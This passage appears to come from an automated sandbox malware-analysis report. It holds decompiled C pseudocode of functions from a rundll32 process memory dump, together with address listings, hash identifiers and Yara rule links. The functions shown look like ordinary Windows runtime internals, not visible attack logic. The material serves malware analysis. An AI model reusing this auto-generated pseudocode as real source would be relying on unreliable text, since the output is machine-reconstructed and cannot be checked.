																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E045D922A(_t99);
										_t64 = E045F7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E046A8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x46c86c0; // 0x29e07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x46c86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x46c86bc;
													_t87 = 0x46c86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E045D9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x46c86c4;
												_t87 = 0x46c86c0;
												L27:
												E04609B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0462D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x46c5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x46c538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                            0x045d9082
                                                                                            0x045d9083
                                                                                            0x045d9084
                                                                                            0x045d9085
                                                                                            0x045d9087
                                                                                            0x045d9096
                                                                                            0x045d9098
                                                                                            0x045d9098
                                                                                            0x045d909e
                                                                                            0x045d90a8
                                                                                            0x045d90e7
                                                                                            0x045d90e7
                                                                                            0x045d90aa
                                                                                            0x045d90b0
                                                                                            0x045d90b7
                                                                                            0x045d90bd
                                                                                            0x045d90dd
                                                                                            0x045d90e6
                                                                                            0x045d90bf
                                                                                            0x045d90bf
                                                                                            0x045d90c7
                                                                                            0x045d90cf
                                                                                            0x045d90f1
                                                                                            0x045d90f2
                                                                                            0x045d90f4
                                                                                            0x045d90f5
                                                                                            0x045d90f6
                                                                                            0x045d90f7
                                                                                            0x045d90f8
                                                                                            0x045d90f9
                                                                                            0x045d90fa
                                                                                            0x045d90fb
                                                                                            0x045d90fc
                                                                                            0x045d90fd
                                                                                            0x045d90fe
                                                                                            0x045d90ff
                                                                                            0x045d9100
                                                                                            0x045d9102
                                                                                            0x045d9107
                                                                                            0x045d910c
                                                                                            0x045d9110
                                                                                            0x045d9113
                                                                                            0x045d9115
                                                                                            0x045d9136
                                                                                            0x045d913f
                                                                                            0x045d9143
                                                                                            0x046337e4
                                                                                            0x046337e4
                                                                                            0x045d9117
                                                                                            0x045d9117
                                                                                            0x045d911d
                                                                                            0x00000000
                                                                                            0x045d911f
                                                                                            0x045d911f
                                                                                            0x045d9125
                                                                                            0x00000000
                                                                                            0x045d9127
                                                                                            0x045d912d
                                                                                            0x045d9130
                                                                                            0x045d9134
                                                                                            0x045d9158
                                                                                            0x045d915d
                                                                                            0x045d9161
                                                                                            0x045d9168
                                                                                            0x04633715
                                                                                            0x045d916e
                                                                                            0x045d916e
                                                                                            0x045d9175
                                                                                            0x045d9177
                                                                                            0x045d917e
                                                                                            0x045d917f
                                                                                            0x045d9182
                                                                                            0x045d9182
                                                                                            0x045d9187
                                                                                            0x045d9187
                                                                                            0x045d918a
                                                                                            0x045d918d
                                                                                            0x045d918f
                                                                                            0x045d9192
                                                                                            0x045d9195
                                                                                            0x045d9198
                                                                                            0x045d9198
                                                                                            0x045d9198
                                                                                            0x045d919a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463371f
                                                                                            0x04633721
                                                                                            0x04633727
                                                                                            0x0463372f
                                                                                            0x04633733
                                                                                            0x04633735
                                                                                            0x04633738
                                                                                            0x0463373b
                                                                                            0x0463373d
                                                                                            0x04633740
                                                                                            0x00000000
                                                                                            0x04633746
                                                                                            0x04633746
                                                                                            0x04633749
                                                                                            0x00000000
                                                                                            0x0463374f
                                                                                            0x0463374f
                                                                                            0x04633751
                                                                                            0x04633757
                                                                                            0x04633759
                                                                                            0x0463375c
                                                                                            0x0463375c
                                                                                            0x0463375e
                                                                                            0x0463375e
                                                                                            0x04633761
                                                                                            0x04633764
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633766
                                                                                            0x04633768
                                                                                            0x046337a3
                                                                                            0x046337a3
                                                                                            0x046337a5
                                                                                            0x046337a7
                                                                                            0x046337ad
                                                                                            0x046337b0
                                                                                            0x046337b2
                                                                                            0x046337bc
                                                                                            0x046337c2
                                                                                            0x046337c2
                                                                                            0x046337b2
                                                                                            0x045d9187
                                                                                            0x045d9187
                                                                                            0x045d918a
                                                                                            0x045d918d
                                                                                            0x045d918f
                                                                                            0x045d9192
                                                                                            0x045d9195
                                                                                            0x00000000
                                                                                            0x045d9195
                                                                                            0x00000000
                                                                                            0x0463376a
                                                                                            0x0463376a
                                                                                            0x0463376a
                                                                                            0x0463376c
                                                                                            0x0463376c
                                                                                            0x0463376f
                                                                                            0x04633775
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633777
                                                                                            0x04633779
                                                                                            0x04633782
                                                                                            0x04633787
                                                                                            0x04633789
                                                                                            0x04633790
                                                                                            0x04633790
                                                                                            0x0463378b
                                                                                            0x0463378b
                                                                                            0x0463378b
                                                                                            0x04633792
                                                                                            0x04633795
                                                                                            0x00000000
                                                                                            0x04633795
                                                                                            0x00000000
                                                                                            0x04633779
                                                                                            0x04633798
                                                                                            0x00000000
                                                                                            0x04633798
                                                                                            0x00000000
                                                                                            0x04633768
                                                                                            0x0463379b
                                                                                            0x0463379b
                                                                                            0x04633751
                                                                                            0x04633749
                                                                                            0x00000000
                                                                                            0x04633740
                                                                                            0x045d91a0
                                                                                            0x045d91a3
                                                                                            0x045d91a9
                                                                                            0x045d91b0
                                                                                            0x00000000
                                                                                            0x045d91b0
                                                                                            0x045d9187
                                                                                            0x045d91b4
                                                                                            0x045d91b4
                                                                                            0x045d91bb
                                                                                            0x045d91c0
                                                                                            0x045d91c5
                                                                                            0x045d91c7
                                                                                            0x046337da
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91d2
                                                                                            0x045d91d5
                                                                                            0x045d9239
                                                                                            0x045d9239
                                                                                            0x045d91d7
                                                                                            0x045d91db
                                                                                            0x045d91e1
                                                                                            0x045d91e7
                                                                                            0x045d91fd
                                                                                            0x045d9203
                                                                                            0x045d921e
                                                                                            0x045d9223
                                                                                            0x00000000
                                                                                            0x045d9205
                                                                                            0x045d9205
                                                                                            0x045d9208
                                                                                            0x045d920c
                                                                                            0x045d9214
                                                                                            0x045d9214
                                                                                            0x045d920c
                                                                                            0x045d91e9
                                                                                            0x045d91e9
                                                                                            0x045d91ee
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91e7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045d9134
                                                                                            0x045d9125
                                                                                            0x045d911d
                                                                                            0x045d914e
                                                                                            0x045d90d1
                                                                                            0x045d90d1
                                                                                            0x045d90d3
                                                                                            0x045d90d6
                                                                                            0x045d90d8
                                                                                            0x00000000
                                                                                            0x045d90d8
                                                                                            0x045d90cf

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e3ac47e56b90072c3ec4b1b52bf54d9e55b5cea87ff34c6728fc6f34643e0e7d
                                                                                            • Instruction ID: b8ed4bb670b906869acff1e4c191becd0fe78839cb7b5adf98cc56dcdd7be443
                                                                                            • Opcode Fuzzy Hash: e3ac47e56b90072c3ec4b1b52bf54d9e55b5cea87ff34c6728fc6f34643e0e7d
                                                                                            • Instruction Fuzzy Hash: 8801D1B26012109FE3249F08EC40B2277A9FF85324F25406BE505DB691E274FC41DBD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A4015 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E046A4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E045F2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E045F2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x46c86ac);
					E045DF900(0x46c86d4, _t28);
					E045EFFB0(0x46c86ac, _t28, 0x46c86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E045EFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                            0x046a401a
                                                                                            0x046a401e
                                                                                            0x046a4023
                                                                                            0x046a4028
                                                                                            0x046a4029
                                                                                            0x046a402b
                                                                                            0x046a402f
                                                                                            0x046a4043
                                                                                            0x046a4046
                                                                                            0x046a4051
                                                                                            0x046a4057
                                                                                            0x046a405f
                                                                                            0x046a4062
                                                                                            0x046a4067
                                                                                            0x046a406f
                                                                                            0x046a407c
                                                                                            0x046a407c
                                                                                            0x046a408c
                                                                                            0x046a408c
                                                                                            0x046a4097

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7389937e966f1870363e03f8c64a87389b40c48fe511c94ad2d9930b7f64c6f3
                                                                                            • Instruction ID: 9e10ef0bc8052cc2db35191a5d525b3bb7fcbfde46250433393f72e4af852078
                                                                                            • Opcode Fuzzy Hash: 7389937e966f1870363e03f8c64a87389b40c48fe511c94ad2d9930b7f64c6f3
                                                                                            • Instruction Fuzzy Hash: 960184722019467FE221AF79CD80E67B7ACFF89658B000629F61883A51DB24FC11DAE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046914FB Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 61%
                                                                                            			E046914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x46cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0461FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E045F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0461B640(E04619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                            0x046914fb
                                                                                            0x046914fb
                                                                                            0x0469150a
                                                                                            0x04691514
                                                                                            0x04691519
                                                                                            0x0469151b
                                                                                            0x04691526
                                                                                            0x0469152c
                                                                                            0x04691534
                                                                                            0x04691537
                                                                                            0x0469153a
                                                                                            0x04691545
                                                                                            0x04691557
                                                                                            0x04691547
                                                                                            0x04691550
                                                                                            0x04691550
                                                                                            0x04691562
                                                                                            0x04691563
                                                                                            0x04691565
                                                                                            0x0469156a
                                                                                            0x0469157f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: caf4c2ea35bc221bf83ef061aef9e663ccd355236518f38c408591226681a96a
                                                                                            • Instruction ID: 38a4fbfdd36b000c45e92f61a1b50907f0a981aa54c5198bb52afc9feec462c7
                                                                                            • Opcode Fuzzy Hash: caf4c2ea35bc221bf83ef061aef9e663ccd355236518f38c408591226681a96a
                                                                                            • Instruction Fuzzy Hash: 1801B571A00248AFDB04DF69D841EAEB7B8EF45710F44406AF914EB390E674EE01CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0469138A Relevance: .0, Instructions: 48COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 61%
                                                                                            			E0469138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x46cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0461FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E045F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0461B640(E04619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                            0x0469138a
                                                                                            0x0469138a
                                                                                            0x04691399
                                                                                            0x046913a3
                                                                                            0x046913a8
                                                                                            0x046913aa
                                                                                            0x046913b5
                                                                                            0x046913bb
                                                                                            0x046913c3
                                                                                            0x046913c6
                                                                                            0x046913c9
                                                                                            0x046913d4
                                                                                            0x046913e6
                                                                                            0x046913d6
                                                                                            0x046913df
                                                                                            0x046913df
                                                                                            0x046913f1
                                                                                            0x046913f2
                                                                                            0x046913f4
                                                                                            0x046913f9
                                                                                            0x0469140e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f4a35426ff8a70305019cc35305707a12b6e098f10752a8e00a22548e926ca84
                                                                                            • Instruction ID: a4ed366dfdbdd942716963b6512a2a38933c436b967d86e35171c9be13cfd6a0
                                                                                            • Opcode Fuzzy Hash: f4a35426ff8a70305019cc35305707a12b6e098f10752a8e00a22548e926ca84
                                                                                            • Instruction Fuzzy Hash: 7A019271A00208AFDB04DFA9D841EAEB7B8EF45710F44406AB904EB380E674AE01C794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D58EC Relevance: .0, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 91%
                                                                                            			E045D58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x46cd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x45b5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E045D5943() != 0 &&  *0x46c5320 > 5) {
					E04657B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04657B5E( &_v28, _t28);
					_t11 = E04657B9C(0x46c5320, 0x45bbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0461B640(_t11, _t17, _v8 ^ _t29, 0x45bbf15, _t27, _t28);
			}















                                                                                            0x045d58fb
                                                                                            0x045d58fe
                                                                                            0x045d5906
                                                                                            0x045d590a
                                                                                            0x045d593c
                                                                                            0x045d593c
                                                                                            0x045d590c
                                                                                            0x045d590c
                                                                                            0x045d5911
                                                                                            0x00000000
                                                                                            0x045d5913
                                                                                            0x045d5913
                                                                                            0x045d5913
                                                                                            0x045d5911
                                                                                            0x045d591d
                                                                                            0x04631035
                                                                                            0x0463103c
                                                                                            0x0463103f
                                                                                            0x04631056
                                                                                            0x04631056
                                                                                            0x045d593b

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c20b4c65f7a9a7540ccd739094cb544fb94f1594e9898a88a84fbb14169c541
                                                                                            • Instruction ID: ef236d24559ce655714f35245dc0eae9a0589770e364294d14357c215e68cf87
                                                                                            • Opcode Fuzzy Hash: 7c20b4c65f7a9a7540ccd739094cb544fb94f1594e9898a88a84fbb14169c541
                                                                                            • Instruction Fuzzy Hash: C9018F31B00118ABE724EF29EC049BE77A8FF84624F9400699905A7258FE30FD02D6D4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A1074 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E046A1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E046A165E(__ebx, 0x46c8ae4, (__edx -  *0x46c8b04 >> 0x14) + (__edx -  *0x46c8b04 >> 0x14), __edi, __ecx, (__edx -  *0x46c8b04 >> 0x14) + (__edx -  *0x46c8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0469AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E045F7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0468FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                            0x046a1074
                                                                                            0x046a1080
                                                                                            0x046a1082
                                                                                            0x046a108a
                                                                                            0x046a108f
                                                                                            0x046a1093
                                                                                            0x046a10ab
                                                                                            0x046a10ab
                                                                                            0x046a10c3
                                                                                            0x046a10cf
                                                                                            0x046a10e1
                                                                                            0x046a10d1
                                                                                            0x046a10da
                                                                                            0x046a10da
                                                                                            0x046a10e9
                                                                                            0x046a10f5
                                                                                            0x046a10f5
                                                                                            0x046a10fe

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db2c18f1da7dad3101a078b1289e542930ad1caff04113f7ff3c125430b651e1
                                                                                            • Instruction ID: 00a8105317e8a4cde3c28c66cd9407302a988ec729b871318d2bf3dfa5d52aeb
                                                                                            • Opcode Fuzzy Hash: db2c18f1da7dad3101a078b1289e542930ad1caff04113f7ff3c125430b651e1
                                                                                            • Instruction Fuzzy Hash: BA012872604B41AFD710EF68C904B5A77D5AB85314F048619F88583391FE34FD50CB96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045EB02A Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045EB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E045F7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04657016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                            0x045eb037
                                                                                            0x045eb039
                                                                                            0x045eb03b
                                                                                            0x045eb040
                                                                                            0x0463a60e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463a61d
                                                                                            0x045eb04b
                                                                                            0x045eb04e
                                                                                            0x0463a627
                                                                                            0x0463a634
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463a641
                                                                                            0x0463a653
                                                                                            0x0463a643
                                                                                            0x0463a64c
                                                                                            0x0463a64c
                                                                                            0x0463a65b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0463a66c
                                                                                            0x045eb057
                                                                                            0x045eb057
                                                                                            0x045eb057
                                                                                            0x045eb046
                                                                                            0x045eb046
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                            • Instruction ID: 8eb441ea93039b77c1502a888068dfc839e9d9b12e5e4275fb873e761b148d1c
                                                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                            • Instruction Fuzzy Hash: B601BC32301980DFD326CB9DC888F7677E8FB46755F0900A1E919CBA61E628FC40E221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0468FE3F Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 59%
                                                                                            			E0468FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x46cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0461FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E045F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0461B640(E04619AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                            0x0468fe3f
                                                                                            0x0468fe3f
                                                                                            0x0468fe4e
                                                                                            0x0468fe58
                                                                                            0x0468fe5d
                                                                                            0x0468fe5f
                                                                                            0x0468fe6a
                                                                                            0x0468fe72
                                                                                            0x0468fe75
                                                                                            0x0468fe78
                                                                                            0x0468fe83
                                                                                            0x0468fe95
                                                                                            0x0468fe85
                                                                                            0x0468fe8e
                                                                                            0x0468fe8e
                                                                                            0x0468fea0
                                                                                            0x0468fea1
                                                                                            0x0468fea3
                                                                                            0x0468fea8
                                                                                            0x0468febd

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c4a710f635a9639db43d1790d2922fe411619bcce4323434ba0f5dc968adc41
                                                                                            • Instruction ID: 4ab1a350b2d85c3969b98981b25093d111ea7b1011d70d50082c51fdf9d026e6
                                                                                            • Opcode Fuzzy Hash: 2c4a710f635a9639db43d1790d2922fe411619bcce4323434ba0f5dc968adc41
                                                                                            • Instruction Fuzzy Hash: B3018471E00248ABDB14EFA9D845FAEB7B8EF44714F04406AB904EB391EA74A901C795
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0468FEC0 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 59%
                                                                                            			E0468FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x46cd360 ^ _t32;
